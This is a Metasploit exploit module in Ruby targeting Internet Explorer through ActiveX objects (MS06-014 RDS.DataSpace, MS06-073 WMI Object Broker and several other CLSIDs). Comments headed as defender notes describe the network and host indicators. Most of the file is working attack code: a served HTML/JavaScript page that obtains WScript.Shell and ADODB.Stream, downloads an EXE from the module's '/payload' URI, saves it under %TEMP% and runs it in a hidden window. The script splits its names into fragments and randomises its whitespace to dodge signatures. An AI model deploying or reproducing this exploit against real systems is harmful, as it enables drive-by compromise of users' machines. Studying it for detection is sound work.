##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  #
  # Browser-side code execution through ActiveX objects that expose
  # CreateObject/GetObject to script. The served page probes a list of
  # CLSIDs, uses the first usable object to obtain WScript.Shell and
  # ADODB.Stream, downloads an EXE from this module's "/payload" sub-URI,
  # writes it under %TEMP% and runs it (see the JavaScript in on_request_uri).
  #
  # Defender notes, all drawn from the code in this file:
  # * Vendor fixes referenced: MS06-014 (RDS.DataSpace) and MS06-073
  #   (WMIScriptUtils.WMIObjectBroker2). The remaining targets are labelled
  #   UNKNOWN and carry the author's own remarks on why they may or may not
  #   be reachable (site-restricted, "not marked as safe", install dialogs).
  # * Network: an HTML response followed by a GET of "<page uri>/payload"
  #   answered with Content-Type application/octet-stream.
  # * Host: the browser process writing "<random>.exe" in %TEMP% through
  #   ADODB.Stream.SaveToFile and launching it through WScript.Shell.Run.
  # * Evasion to account for in signatures: every method/ProgID name in the
  #   script is split into string fragments, identifiers are random per
  #   request, and Rex::Text.randomize_space rewrites the page's whitespace,
  #   so plain substring matches on "CreateObject" or "WScript.Shell" miss it.
  #
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Seh
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  # BrowserAutopwn fingerprint: only IE on Windows with JavaScript enabled, and
  # only when one of the listed CLSIDs is instantiable. The :classid list
  # mirrors the CLSIDs of the Targets declared in initialize.
  autopwn_info({
    :ua_name => HttpClients::IE,
    # In badly misconfigured situations, IE7 and 8 could be vulnerable to
    # this, but by default they throw an ugly popup that stops all script
    # execution until the user deals with it and aborts everything if they
    # click "no". Not worth the risk of being unable to try more recent
    # exploits. Make sure service packs on top of 6.0 are considered less
    # than the max by setting to 6.1 (which doesn't really exist).
    :ua_maxver => "6.1",
    :javascript => true,
    :os_name => OperatingSystems::WINDOWS,
    :method => [ 'CreateObject', 'GetObject' ],
    :classid =>
    [
      '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
      '{BD96C556-65A3-11D0-983A-00C04FC29E30}',
      '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
      '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
      '{6414512B-B978-451D-A0D8-FCFDF33E833C}',
      '{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
      '{639F725F-1B2D-4831-A9FD-874847682010}',
      '{BA018599-1DB3-44f9-83B4-461454C84BF8}',
      '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
      '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
      '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
      '{0006F033-0000-0000-C000-000000000046}',
      '{0006F03A-0000-0000-C000-000000000046}',
    ],
    #:rank => ExcellentRanking # reliable exe writer
  })

  #
  # Module metadata. 'Automatic' (DefaultTarget 0) has no CLSID of its own and
  # makes on_request_uri emit every CLSID-bearing target; any other target
  # emits just its own CLSID. 'Space' and 'StackAdjustment' are the payload
  # constraints handed to the framework's payload generator.
  #
  # @param info [Hash] module info merged by update_info
  #
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Internet Explorer COM CreateObject Code Execution',
      'Description' => %q{
This module exploits a generic code execution vulnerability in Internet
Explorer by abusing vulnerable ActiveX objects.
      },
      'License' => MSF_LICENSE,
      'Author' =>
      [
        'hdm',
      ],
      'References' =>
      [
        # MDAC
        [ 'MSB', 'MS06-014' ],
        [ 'CVE', '2006-0003' ],
        [ 'OSVDB', '24517' ],
        # WMI Object Broker
        [ 'MSB', 'MS06-073' ],
        [ 'CVE', '2006-4704' ],
        [ 'OSVDB', '30155' ],
      ],
      'Payload' =>
      {
        'Space' => 2048,
        'StackAdjustment' => -3500,
      },
      'Platform' => 'win',
      'Targets' =>
      [
        [ 'Automatic', { } ],

        # Patched
        [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
        # Found in mpack
        [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],

        # Patched
        [ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],

        # These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
        [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],
        [ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],

        # Visual Studio components, not marked as safe
        [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
        [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
        [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
        [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
        [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],

        #
        # The controls below can launch the "installing component" dialogs...
        #

        # Not marked as safe
        [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],

        # Not marked as safe
        [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],

        # Found exploitable in the wild (no details)
        [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],

      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Apr 11 2006'))
  end

  #
  # Serves both stages of the exploit from one handler.
  #
  # @param cli     client connection; responses are written to it and it is
  #                handed to handler() after the HTML stage is sent
  # @param request incoming HTTP request; only request.uri is inspected
  #
  # A URI containing "payload" is the second stage (the EXE the page's script
  # downloads); every other URI receives the first stage (HTML + JavaScript).
  #
  def on_request_uri(cli, request)

    if (request.uri.match(/payload/))
      # The payload is regenerated for this client; nil means it could not be
      # produced, in which case nothing is sent back at all.
      return if ((p = regenerate_payload(cli)) == nil)
      data = generate_payload_exe({ :code => p.encoded })
      print_status("Sending EXE payload")
      # Second-stage marker on the wire: binary body with this Content-Type.
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    # Build out the HTML response page
    # Random identifiers (2..31 alpha characters) so function/variable names
    # differ between requests; var_exe_name becomes the file name written to
    # %TEMP% by the script below.
    var_html = rand_text_alpha(rand(30)+2)
    var_func_exploit = rand_text_alpha(rand(30)+2);
    var_func_go = rand_text_alpha(rand(30)+2);
    var_func_createo = rand_text_alpha(rand(30)+2);
    var_exe_name = rand_text_alpha(rand(30)+2);
    var_objects = ''

    # Build the object list based on target selection
    # Each CLSID is emitted as '+'-joined single-character JS string literals
    # followed by a comma, so the list drops straight into the
    # `new Array( ... null )` expression in the script. 'Automatic' walks every
    # target that declares a CLSID (the 'Automatic' entry itself has none and
    # is skipped by the `next`).
    if (target.name == 'Automatic')
      targets.each do |t|
        next if not t['CLSID']
        var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
      end
    else
      var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
    end

    # The JavaScript below is a runtime string and is kept verbatim; the
    # fragmented names ("C"+"re"+"ate"+...) are part of what is sent.
    # Flow: <var_func_exploit> iterates the CLSID array, instantiates each as
    # an <object> element (non-'{' entries would go through ActiveXObject,
    # but only CLSIDs are emitted above), and calls <var_func_go> on the first
    # object from which <var_func_createo> can obtain WScript.Shell.
    # <var_func_go> then fetches document.location + "/payload" with a
    # synchronous XMLHttpRequest, writes responseBody to
    # %TEMP%\<var_exe_name>.exe through ADODB.Stream, and runs it via
    # WScript.Shell.Run (second argument 0 — presumably the hidden window
    # style; confirm against the WScript documentation).
    content = %Q^
<html><head><title></title>
<script language="javascript">

function #{var_func_createo}( o , n ) {
var r = null;

try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}

if (! r) {
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
}

if (! r) {
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
}

if (! r) {
try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
}

if (! r) {
try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
}

if (! r) {
try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
}

return( r );
}

function #{var_func_go}( a ) {

var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );

var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );

var e = s.Environment( "P" + "ro" + "ce" + "ss" );

var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
var xml = null;
var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
var dat;

try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}

if (! xml) {
return(0);
}

xml.open("GET", url, false);
xml.send(null);
dat = xml.responseBody;

o.Type = 1 ;
o.Mode = 3 ;
o.Open ( ) ;
o.Write ( dat ) ;
o.SaveToFile ( bin, 2) ;

s.Run ( bin , 0 );
}

function #{var_func_exploit}( ) {
var i = 0;
var t = new Array( #{var_objects} null );

while (t[i]) {
var a = null;

if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}

if (a) {
try {
var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
if (b) {
#{var_func_go}( a ) ;
return(0) ;
}
} catch(e){
}
}

i++;
}
}

</script>
</head>
<body onload='#{var_func_exploit}()'>
#{var_html}
</body>
</html>

^

    # Whitespace is rewritten after interpolation, so two requests never yield
    # byte-identical pages; whitespace-sensitive signatures on this page do not
    # hold.
    content = Rex::Text.randomize_space(content)

    print_status("Sending exploit HTML...")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    # The connection is passed to the framework's payload handler after the
    # first stage is sent (presumably so a session from the payload can be
    # picked up; handler() is defined outside this file).
    handler(cli)
  end

end